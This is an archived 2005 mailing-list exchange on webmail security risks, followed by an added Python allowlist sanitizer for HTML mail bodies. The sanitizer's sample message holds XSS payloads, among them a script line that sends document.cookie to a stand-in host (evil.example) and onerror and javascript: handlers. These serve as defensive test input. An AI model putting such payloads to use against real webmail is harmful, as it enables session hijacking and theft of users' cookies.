WebApp Sec mailing list archives
RE: Webmail Service vulnerabilities
From: "Scovetta, Michael V" <Michael.Scovetta () ca com>
Date: Tue, 4 Jan 2005 16:29:45 -0500
Dimo,

A webmail service is just a web application, and could be vulnerable to anything that a general application could be (injection, hijacking, bad crypto, etc). Take a look at the OWASP "top ten" (owasp.org) and go from there. In particular, if the webmail service exposes additional points of contact (web services, pop, etc), then you need to pen-test those points too.

Specific to a webmail application, you need to be particularly careful about XSS and broken authentication, as those would likely be the first to be attacked.

Michael Scovetta
Computer Associates
Senior Application Developer

-----Original Message-----
From: Dimitri Borjac [mailto:dimooo () gmail com]
Sent: Tuesday, January 04, 2005 8:27 AM
To: webappsec () securityfocus com
Subject: Webmail Service vulnerabilities

Hi folks!

I'm trying to list the different vulnerabilities a classical Webmail service could present. I didn't find any specific documentation regarding this particular type of service, but some flaws common to multiple webapps could theoretically affect it.

Among them I have listed so far: XSS and XST (script and form injection), CSRF, session hijacking (based on cookies, session ids, ...), any kind of parameter manipulation.

Has any of you already performed an audit of such a service? Or based on your experience over webapps security, do you see any other vuln this service could present?

Thanks a lot for your suggestions or recommendations!

-dimo
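The XSS risk both messages single out is specific to webmail in one way: the application renders HTML that the attacker authored (the message body), so output encoding alone is not enough and the body has to be rewritten against an allowlist. The following is an added example, not code from either poster or from any webmail product: a small allowlist sanitizer for HTML mail bodies built on the Python standard library. The tag and attribute allowlists, the URL scheme allowlist and the sample message are assumptions chosen for the example; a real deployment would tune them (for instance allowing cid: image references) and run a maintained sanitizer library instead.

```python
import re
from html import escape
from html.parser import HTMLParser

# Assumed allowlists for the example: tags a webmail client is willing to
# render from an untrusted body, and the attributes each may carry. Anything
# not listed is dropped, which removes on* handlers and style= (CSS
# expression()/url() tricks) without having to enumerate them.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a", "img",
                "ul", "ol", "li", "blockquote", "div", "span", "h1", "h2", "h3"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
VOID_TAGS = {"br", "img"}
# Elements whose content must disappear too, not just the tag itself.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed",
                     "noscript", "svg", "math", "template"}
URL_ATTRS = {"href", "src"}
SAFE_URL = re.compile(r"^(?:https?:|mailto:)", re.IGNORECASE)


def safe_url(value):
    """Return the URL if its scheme is allowlisted, else None."""
    # Browsers ignore control characters and whitespace inside the scheme,
    # so "java\tscript:" still executes; strip them before checking so the
    # check sees what the browser will see.
    normalised = re.sub(r"[\x00-\x20]", "", value or "")
    return normalised if SAFE_URL.match(normalised) else None


class MailHtmlSanitizer(HTMLParser):
    """Allowlist sanitizer: keeps listed tags and attributes, re-escapes all
    text, and drops everything else (comments, declarations, unknown tags)."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []     # allowed tags currently open, for balancing
        self.skip_depth = 0     # > 0 while inside a DROP_WITH_CONTENT element

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            return                      # drop the tag, keep its text children
        parts = [tag]
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                # onerror=, onclick=, style=, ...
            if name in URL_ATTRS:
                value = safe_url(value)
                if value is None:
                    continue            # javascript:, data:, vbscript:, relative
            parts.append('%s="%s"' % (name, escape(value or "", quote=True)))
        self.out.append("<%s>" % " ".join(parts))
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth -= 1
            return
        if tag in self.open_tags:
            # Close any unclosed children first so the output stays balanced.
            while True:
                closed = self.open_tags.pop()
                self.out.append("</%s>" % closed)
                if closed == tag:
                    break

    def handle_data(self, data):
        # Entities were decoded by the parser; re-escape so text is text.
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

    def result(self):
        self.close()                    # flush buffered trailing text
        while self.open_tags:
            self.out.append("</%s>" % self.open_tags.pop())
        return "".join(self.out)


def sanitize_mail_html(body):
    parser = MailHtmlSanitizer()
    parser.feed(body)
    return parser.result()


# Constructed sample message body for the example (not a real captured mail),
# carrying the usual webmail payloads: handler attributes, a javascript: link,
# a script block, a CSS url() trick and a commented-out payload.
SAMPLE_MAIL_BODY = (
    '<p>Hi, see <a href="https://example.com/report" onclick="steal()">report</a>.</p>'
    '<img src="x" onerror="alert(document.cookie)">'
    '<a href="JaVaScRiPt:alert(document.cookie)">click</a>'
    '<script>document.location="https://evil.example/?"+document.cookie</script>'
    '<div style="background:url(javascript:alert(1))">styled</div>'
    '<!-- <img src=x onerror=alert(1)> -->'
    '5 &lt; 6 &amp; <b>bold</b>'
)

if __name__ == "__main__":
    print(sanitize_mail_html(SAMPLE_MAIL_BODY))
```

Two points worth noting from the design: the scheme check runs on a value with control characters removed, because the parser hands back the literal attribute text while the browser normalises it before deciding whether a link is `javascript:`; and the sanitizer tracks its own open-tag stack so an unterminated tag in the message cannot swallow the rest of the inbox page it is embedded in.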
Current thread:
- Webmail Service vulnerabilities Dimitri Borjac (Jan 04)
- Re: Webmail Service vulnerabilities Moritz Naumann (Jan 06)
- Re: Webmail Service vulnerabilities Tim Brown (Jan 06)
- <Possible follow-ups>
- RE: Webmail Service vulnerabilities Scovetta, Michael V (Jan 06)